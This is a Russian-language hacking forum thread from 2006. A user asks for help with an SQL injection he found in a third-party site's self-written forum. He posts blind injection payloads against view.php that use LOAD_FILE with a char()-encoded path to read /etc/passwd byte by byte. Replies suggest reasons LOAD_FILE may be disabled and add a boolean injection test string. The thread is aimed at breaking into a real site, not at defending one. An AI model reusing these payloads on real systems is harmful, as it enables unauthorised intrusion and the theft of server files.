Форумы SQL-inj на самописном форуме

Discussion in 'Уязвимости CMS/форумов' started by cop, 14 Nov 2006.

  1. cop

    cop Elder - Старейшина

    Joined:
    14 Nov 2006
    Messages:
    58
    Likes Received:
    1
    Reputations:
    4
    Нашел дырочку в одном из форумов, который судя по всему написан автором сайта.

    Пытаюь проверить на существования файлы на сервере ну и потом перебором получить содержимое. К примеру /etc/passwd.

    Вот как это выглядит:

    Code:
    view.php?forumid=1 AND -11 < (SELECT ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1)) FROM dayx_users LIMIT 1) /*
    Воспринимается подзапрос как ложь. Т.е. всеравно что бы я написал
    Code:
    view.php?forumid=1 AND 1 = 0 /*
    уже пробовал и так

    Code:
    view.php?forumid=1 AND -11 < (SELECT CONCAT(1,ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1))) FROM dayx_users LIMIT 1) /*
    всеравно не срабатывает.

    ЧТо может быть с этим оператором LOAD_FILE ?

    Да, если ввожу как параметр в LOAD_FILE любое значение, то всеравно ноль реакции.
     
    #1 cop, 14 Nov 2006
    Last edited: 14 Nov 2006
    1 person likes this.
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Он может быть отключен или у тебя нету прав.
     
  3. cop

    cop Elder - Старейшина

    Joined:
    14 Nov 2006
    Messages:
    58
    Likes Received:
    1
    Reputations:
    4
    Можно как-то проверить какие права у пользователя?
     
  4. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Функция Load_file() выключена на бесплатном хостнинге
     
  5. cop

    cop Elder - Старейшина

    Joined:
    14 Nov 2006
    Messages:
    58
    Likes Received:
    1
    Reputations:
    4
    а причем здесь бесплатный хостинг? :)
     
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    view.php?forumid=1'+or+'1' ='1/*
    тести если выведет тоже самое то есть inj
     
  7. cop

    cop Elder - Старейшина

    Joined:
    14 Nov 2006
    Messages:
    58
    Likes Received:
    1
    Reputations:
    4
    Та это уже прошел, там есть возможность инъекции...
     
  8. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Стучи в асю посмотрю.